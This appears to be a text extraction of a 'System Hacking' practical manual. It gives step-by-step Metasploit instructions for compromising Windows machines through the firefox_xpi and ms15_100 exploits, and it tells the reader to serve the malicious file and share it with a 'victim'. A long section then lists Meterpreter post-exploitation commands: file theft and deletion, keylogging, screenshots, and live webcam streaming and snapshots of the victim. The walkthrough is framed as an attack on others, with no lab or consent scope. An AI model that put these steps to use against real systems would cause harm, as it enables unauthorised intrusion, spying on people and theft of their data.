System Hacking:
Practical No 1: Basics
Open a blank terminal and type
service postgresql start
and wait for few minutes
and then type
msfconsole
The above command will load Metasploit framework console version where we can use number of
modules of Metasploit framework by command line interface.
Msfconsole basics:
show exploits
payloads
auxiliary
post
encoders
nops
options
You can use the show command with above mentioned combinations of options to see several modules
and options for the modules we already selected.
You can use
search <keyword>
To search for a particular keyword from the available modules in your Metasploit.
Ex: search ftp
You can use
exit command to come out of the Metasploit framework.
If you have some active sessions you have to type
exit –y
Chinni Diwakar 1
Practical No 2: Hacking PC with Firefox
Hacking windows with firefox exploit using msfconsole:
Open a blank terminal and type
service postgresql start
msfconsole
Once you get msf> prompt just search for firefox_xpi
search firefox_xpi
You will get an exploit list like above. Just copy the exploit name and paste followed by info command
and execute to get information of the exploit
Chinni Diwakar 2
Once you saw the information you can configure the exploit with use command.
use <exploitname>
You can type show targets to see the available targets
Chinni Diwakar 3
For a specific target please set your target as Native Payload
You can configure a payload with set PAYLOAD command
set PAYLOAD <payload name>
You can execute show options command to see required options to run the exploit successfully.
show options
Configure important options like SRVHOST and SRVPORT and URIPATH and LHOST
Chinni Diwakar 4
Once you know that you configured everything properly execute show options to confirm.
Then type exploit to start the malicious server.
Now whoever victims click on your malicious links they will be shown like below picture.
To list out the hacked victims you need to execute a command
sessions
In the attack area
Chinni Diwakar 5
To access any specific session you need to execute command
session –i <ID Number of session>
Now you will get meterpreter prompt in msfconsole windows which confirms you are inside of the
victim machine you can execute a ‘?’ in meterpreter prompt to see the possible commands list.
Chinni Diwakar 6
Chinni Diwakar 7
For Example iam executing sysinfo command to get the system details like show in the below image
Chinni Diwakar 8
More meterpreter commands are explained in the document further.
Practical No 3: Hacking windows machine with ms15_100 exploit.
Step 1: load Metasploit framework with
service postgresql start
msfconsole
Step 2: search for exploit code
search ms15_100
Step 3: configuring exploit
use <exploit name>
Step 4: configuring payload
set PAYLOAD <payload name>
Chinni Diwakar 9
Step 5: configuring options
show options
set SRVHOST <attacker IP>
set LHOST <attacker IP>
set LPORT <attacker port>
set SRVHOST <attacker IP>
set FILENAME <filename.mcl>
exploit
This will create a .mcl file on your /root/.msf5/local/filename.mcl
Chinni Diwakar 10
Please share this file with your victim.
For this purpose you can use apache2 server in your kali linux.
Step6:
Syntax: cp sourcefile apache2location
Ex: cp /root/.msf5/local/filename.mcl /var/www/html
service apache2 start
Now wait for connection.
As we select meterpreter as payload you would get a meterpreter access of the target computer.
Chinni Diwakar 11
Practical No: 4 Meterpreter Commands
sysinfo command
to know about the system
ifconfig command
to know the victim IP
Chinni Diwakar 12
ii
pwd command
To know what is the current working directory
And cd command is to change the directory
Chinni Diwakar 13
ls is to see the available files in the current directory
cat command is to read the text file contents
This command will show output like the below image
Chinni Diwakar 14
download command is to download any file form the victim PC to attacker PC
Chinni Diwakar 15
rm is to delete any file
Chinni Diwakar 16
Like this
upload command is used to upload any file form attacker machine to victim machine
Chinni Diwakar 17
You need to give the complete file path to successfully transfer that file.
Chinni Diwakar 18
Chinni Diwakar 19
background command is used to come out of a valid session without losing it.
Again you can use sessions –i <ID no>
To get the session back
You can use keyscan_start to start a passive keylogger in the target machine
keyscan_dump to get the keylogger logs
keyscan_stop to stop the keylogger
ps is to know the available Processes and their Process IDs (PIDs)
Chinni Diwakar 20
migrate is to jump from one PID to another PID
getuid used to get the userid of the target machine
getpid is used to get the running process id of the active session
execute is used to execute any executable like an .exe or .msi on the target machine
screenshot command is used to get an active screenshot of the target machine, you can follow the file
path to see the screenshot.
Chinni Diwakar 21
You can see the victim webcam live streaming with webcam_stream option
Chinni Diwakar 22
You can also take pictures from victim webcam with webcam_snap option
Chinni Diwakar 23